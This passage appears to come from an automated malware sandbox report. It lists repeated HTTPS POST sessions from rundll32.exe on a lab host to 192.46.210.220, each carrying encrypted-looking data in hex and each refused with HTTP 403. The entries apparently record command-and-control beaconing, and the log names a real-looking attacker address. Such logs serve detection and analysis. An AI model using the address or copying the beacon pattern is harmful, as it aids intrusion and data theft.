                                                                                                          2021-10-28 03:09:19 UTC129OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:20 UTC134INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:20 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          27192.168.2.649872192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:21 UTC134OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:21 UTC134OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:21 UTC139INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:21 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          28192.168.2.649880192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:23 UTC139OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:23 UTC139OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:24 UTC144INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:23 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          29192.168.2.649884192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:25 UTC144OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:25 UTC144OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:25 UTC149INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:25 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          3192.168.2.649767192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:31 UTC14OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:31 UTC14OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:32 UTC19INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:32 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          30192.168.2.649889192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:27 UTC149OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:27 UTC149OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:27 UTC154INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:27 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          31192.168.2.649893192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:29 UTC154OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:29 UTC154OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:29 UTC159INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:29 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          32192.168.2.649897192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:31 UTC159OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:31 UTC159OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:31 UTC164INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:31 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          33192.168.2.649901192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:33 UTC164OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:33 UTC164OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:33 UTC169INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:33 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          34192.168.2.649905192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:34 UTC169OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:34 UTC169OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:35 UTC174INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:35 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          35192.168.2.649909192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:37 UTC174OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:37 UTC174OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:37 UTC179INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:37 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          36192.168.2.649913192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:39 UTC179OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:39 UTC179OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:40 UTC184INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:40 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          37192.168.2.649917192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:41 UTC184OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:41 UTC184OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:41 UTC189INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:41 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          38192.168.2.649922192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:43 UTC189OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
